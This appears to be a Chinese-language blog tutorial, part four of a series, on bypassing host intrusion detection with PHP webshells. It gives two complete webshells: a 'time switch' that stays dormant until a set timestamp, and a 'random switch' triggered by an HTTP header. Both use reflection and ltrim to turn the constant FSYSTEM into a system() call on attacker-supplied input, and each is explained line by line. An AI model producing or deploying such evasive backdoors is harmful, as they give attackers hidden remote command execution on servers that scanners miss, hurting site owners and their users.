WEB安全--RCE--webshell HIDS bypass4

继WEB安全--RCE--webshell HIDS bypass3的补充：

十三、时间开关

webshell：

<?php
ini_set("display_errors",1);
function foo($test, $bar = FSYSTEM)
{
 echo $test . $bar;
}
$function = new ReflectionFunction('foo');
$q = new ParseError($_GET[a]);
foreach ($function->getParameters() as $param) {
 $da = new DateTime();
 echo $da->getTimestamp();
 echo 'Name: ' . $param->getName() . PHP_EOL;
 $n='F';
 if ($param->isOptional()) {
 if($da->getTimestamp()>=1725329100||$n='1'){
 echo $n;
 }
 echo 'Default value: ' . ltrim($param->getDefaultValueConstantName(),$n)($q->getMessage());
 }
 echo PHP_EOL;
}
?>

原理：

核心位置

$n='F' 
if($da->getTimestamp()>=1725329100||$n='1'){
 echo $n;
 }

或运算符“||”也叫短路运算符，当前者成立就不会再判断后者了

我们回过头来看$da->getTimestamp()>=1725329100||$n='1' ，当$da->getTimestamp()>=1725329100为假，$n='1'就会执行赋值的操作，这时$n的值就由'F'变为'1'，但是当$da->getTimestamp()>=1725329100为真，那么就不会执行$n='1'的操作，$n='F'的值就不变了。

我们的核心思想是：在上传webshell给hids检测时$da->getTimestamp()>=1725329100这个条件是假的，当然就不会被查杀，但是过了一段时间这个条件就为真了，我们这个时候访问webshell就能执行命令了。

function foo($test, $bar = FSYSTEM)
{
 echo $test . $bar;
}
$function = new ReflectionFunction('foo');

创建一个函数传递内容，再用反射获取该函数

foreach ($function->getParameters() as $param) 

遍历取出内容

$param->getDefaultValueConstantName()

这里的参数为FSYSTEM

ltrim($param->getDefaultValueConstantName(),$n)

此时满足时间条件，$n='F'，ltrim从参数的默认值常量名中去掉前导的$n，也就是说FSYSTEM会变成SYSTEM，就能构成命令执行

十四、随机开关

webshell：

<?php
ini_set("display_errors",1);
function foo($test, $bar = FSYSTEM)
{
 echo $test . $bar;
}
$function = new ReflectionFunction('foo');
$q = new ParseError($_GET[a]);
$p = new ParseError($_SERVER[HTTP_A]);
foreach ($function->getParameters() as $param) {
 $da = new DateTime();
 echo $da->getTimestamp();
 echo 'Name: ' . $param->getName() . PHP_EOL;
 $n='F';
 if ($param->isOptional()) {
 if(mt_rand(55,$p->getMessage()??100)==55||$n='1'){
 echo $n;
 }
 echo 'Default value: ' . 
ltrim($param->getDefaultValueConstantName(),$n)($q->getMessage());
 }
 echo PHP_EOL;
}
?>

原理：

大致原理和时间开关相同。

核心位置

$p = new ParseError($_SERVER[HTTP_A]);
$n='F';
if(mt_rand(55,$p->getMessage()??100)==55||$n='1'){
 echo $n;
 }

$p->getMessage()??100：指如果前者有值就取前者，反之取后者的值

mt_rand(1,10)：在1-10的闭区间随机取一个值

思考：如果在ParseError()中传入55，那么$p->getMessage()的值就是55，也就是说mt_rand(55,55) ==>55，if(55==55 || $n='1')第一个条件为真就不会进行$n='1'的操作，$n='F'，就能截取FSYSTEM中的F了。